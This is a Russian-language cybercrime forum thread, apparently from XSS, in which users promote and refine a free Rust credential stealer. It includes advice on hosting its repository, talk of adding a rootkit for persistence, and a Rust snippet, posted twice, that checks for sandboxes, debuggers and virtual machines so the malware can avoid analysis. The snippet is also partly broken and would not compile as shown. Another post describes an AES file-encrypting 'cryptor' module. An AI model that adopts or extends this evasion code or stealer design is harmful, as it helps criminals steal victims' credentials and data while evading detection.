• XSS.stack #1 – первый литературный журнал от юзеров форума

FREE & opensrc Rust Stealer

prob down due to attacks again lol
DDoS?

Might be better to use Tor onion and use LockBit Ransomware method to defend from DDoS.

AFAIK, it require a visitor to run javascript, then compute the hash in Tor Browser
The hash generated in client will be checked to match a hash in server.

If it match, client will use it as authkey in headers.

 
DDoS?

Might be better to use Tor onion and use LockBit Ransomware method to defend from DDoS.

AFAIK, it require a visitor to run javascript, then compute the hash in Tor Browser
The hash generated in client will be checked to match a hash in server.

If it match, client will use it as authkey in headers.

JS protections have long been bypassed, also most ppl have JS disabled in TOR
 
I try many method to add icon in Rust but not work. Do you support add icon in future?
A Icon can manually be added like on every other exe, I dont think its my responsibility to add a icon changer so for now not
 
JS protections have long been bypassed, also most ppl have JS disabled in TOR

hmmm... okay.
but why your gitbucket HTTP only ? >.<

use this command to generate JKS certificate

keytool -genkey -keyalg RSA -alias selfsigned -keystore dokitokeystore.jks -storepass dokitostrongpass -validity 360 -keysize 2048

and re-run your gitbucket.war process


java -jar gitbucket.war --connectors=https --key_store_path=./dokitokeystore.jks --key_store_password=dokitostrongpass --key_manager_password=dokitostrongpass

then it should be available as https://bertylol.tech:8443

sure you can always change default port. refer to this again:

 
hmmm... okay.
but why your gitbucket HTTP only ? >.<

use this command to generate JKS certificate

keytool -genkey -keyalg RSA -alias selfsigned -keystore dokitokeystore.jks -storepass dokitostrongpass -validity 360 -keysize 2048

and re-run your gitbucket.war process


java -jar gitbucket.war --connectors=https --key_store_path=./dokitokeystore.jks --key_store_password=dokitostrongpass --key_manager_password=dokitostrongpass

then it should be available as https://bertylol.tech:8443

sure you can always change default port. refer to this again:

Was too lazy for it😅
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если есть желания улучшать код данного Stealer стоит изучить данный график.
Можно так-же использовать данную методику
Ну если уже я думаю ставить автозагрузку то в месте с rootkit
 
Если есть желания улучшать код данного Stealer стоит изучить данный график.
Можно так-же использовать данную методику
Ну если уже я думаю ставить автозагрузку то в месте с rootkit

Thanks
Overview:
1: Provides some good anti vm Tips, will implement some of it

2. Needs a Server thats Always up for the stealer to Work

3. Rootkit would be Overkill, also every User would need to sign the driver, or load it via a vulnerable driver
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Thanks
Overview:
1: Provides some good anti vm Tips, will implement some of it

2. Needs a Server thats Always up for the stealer to Work

3. Rootkit would be Overkill, also every User would need to sign the driver, or load it via a vulnerable driver
Код:
use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::process::exit;
use std::thread;
use std::time::Duration;

fn detect_sandbox() -> bool {
    // Check for the presence of files commonly used by sandboxes
    Path::new("/proc/self/status").exists() || Path::new("/proc/cpuinfo").exists() ||
    Path::new("/proc/registry").exists()
}

fn detect_debugger() -> bool {
    let mut process = Command::new("cat")
        .arg("/proc/self/status")
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn()
        .expect("Failed to start cat process");

    let pid = process.id();

    let _result = process.wait_timeout(Duration::from_millis(100));
    let result = match _result {
        Ok(status) => status,
        Err(_) => {
            let _ = process.kill();
            return true;
        }
    };

    if result.code() == Some(0) {
        return false;
    }

    let _ = process.kill();
    match env::var("LD_PRELOAD") {
        Ok(val) => return val.contains("libpthread.so"),
        Err(_) => return false,
    }
}

fn detect_vm() -> bool {
    // Check for the presence of files commonly used by virtual machine software
    Path::new("/dev/vmmon").exists() || Path::new("/dev/kvm").exists() ||
    Path::new("/dev/vboxdrv").exists()
}

fn main() {
    // Add the anti-VM, anti-sandbox, anti-debugging checks
    if detect_sandbox() {
        println!("Warning: You cannot run it in a sandbox environment. The program will now close.");
        exit(1);
    }

    if detect_debugger() {
        println!("Warning: You cannot run it with a debugger attached. The program will now close.");
        exit(1);
    }

    if detect_vm() {
        println!("Warning: You cannot run it in a virtual machine. The program will now close.");
        exit(1);
    }
 
Код:
use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::process::exit;
use std::thread;
use std::time::Duration;

fn detect_sandbox() -> bool {
    // Check for the presence of files commonly used by sandboxes
    Path::new("/proc/self/status").exists() || Path::new("/proc/cpuinfo").exists() ||
    Path::new("/proc/registry").exists()
}

fn detect_debugger() -> bool {
    let mut process = Command::new("cat")
        .arg("/proc/self/status")
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn()
        .expect("Failed to start cat process");

    let pid = process.id();

    let _result = process.wait_timeout(Duration::from_millis(100));
    let result = match _result {
        Ok(status) => status,
        Err(_) => {
            let _ = process.kill();
            return true;
        }
    };

    if result.code() == Some(0) {
        return false;
    }

    let _ = process.kill();
    match env::var("LD_PRELOAD") {
        Ok(val) => return val.contains("libpthread.so"),
        Err(_) => return false,
    }
}

fn detect_vm() -> bool {
    // Check for the presence of files commonly used by virtual machine software
    Path::new("/dev/vmmon").exists() || Path::new("/dev/kvm").exists() ||
    Path::new("/dev/vboxdrv").exists()
}

fn main() {
    // Add the anti-VM, anti-sandbox, anti-debugging checks
    if detect_sandbox() {
        println!("Warning: You cannot run it in a sandbox environment. The program will now close.");
        exit(1);
    }

    if detect_debugger() {
        println!("Warning: You cannot run it with a debugger attached. The program will now close.");
        exit(1);
    }

    if detect_vm() {
        println!("Warning: You cannot run it in a virtual machine. The program will now close.");
        exit(1);
    }
Linux antivm?
 
- Implementing enryption with Rust Cryptor (Open-Source) you can drop message me for help.
- It uses the (rand) crate to generate a secure key and nonce. And the aes_ctr crate to perform the AES encryption, file contents are read into memory, encrypted, and then written back to a new file with the extension (.enc).
- Added mod , this will separate the file encryption logic into a separate module, making the code more organized and reusable.

Pass - local
Подскажите плиз, как собрать его. Пробовал cargo build --release, ошибка что нет манифеста, написал левый манифест, потом ошибка при сборке, что библиотека aes_ctr уже не работает. С растом никогда дел не имел. Только С#
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Please tell me how to collect it. I tried cargo build --release, an error that there is no manifest, wrote the left manifest, then an error during assembly that the aes_ctr library no longer works. Never dealt with growth. Only with#
I will update the latter. for now just cheers.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх